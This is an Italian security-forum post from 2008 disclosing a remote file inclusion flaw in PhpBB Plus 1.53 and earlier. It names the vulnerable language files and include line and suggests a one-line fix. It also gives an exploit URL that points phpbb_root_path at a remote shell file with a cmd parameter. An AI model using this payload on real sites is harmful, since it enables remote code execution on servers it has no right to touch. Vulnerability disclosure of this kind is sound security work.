[OLD] PhpBB Plus <= 1.53 Remote File Include

Benvenuto! Accedi o registrati.
Hai dimenticato l'e-mail di attivazione?

Notizie:
Cosa vorreste vedere? Vediamo di accontentare tutti! XD

.:: TuxMeaLux.net Forum ::. | Security | Exploits & PoC | [OLD] PhpBB Plus <= 1.53 Remote File Include

Pagine: [1]

« precedente successivo »

Stampa

Autore

Discussione: [OLD] PhpBB Plus <= 1.53 Remote File Include (Letto 849 volte)

Matrix86

Amministratore
Full Member

Popolarità: +7/-0

Scollegato

Messaggi: 134

[OLD] PhpBB Plus <= 1.53 Remote File Include

« inserito:: Settembre 22, 2008, 09:44:03 »

Rfi molto vecchia, mai pubblicata.

Citazione

AUTHOR :
   Matrix86 of Rbt-4 Crew
Contact:
   info [_AT_] rbt-4 [_DOT_] net

Found Rfi in
   language/lang_german/lang_admin_album.php
   language/lang_english/lang_admin_album.php

Vulnerability info:
   Line: 25
   Code: include($phpbb_root_path.'language/lang_german/lang_hierarchy_album.' . $phpEx);

Exploit example:
   http://[PhpBBPlus]/language/lang_english/lang_admin_album.php?phpbb_root_path=[shell.txt]?cmd=

Fix rfi:
   Line: 24
   Code: if(!defined('IN_PHPBB')) die("Fixed...Sorry =)");


	Registrato

Pagine: [1]

Stampa

« precedente successivo »

Vai a: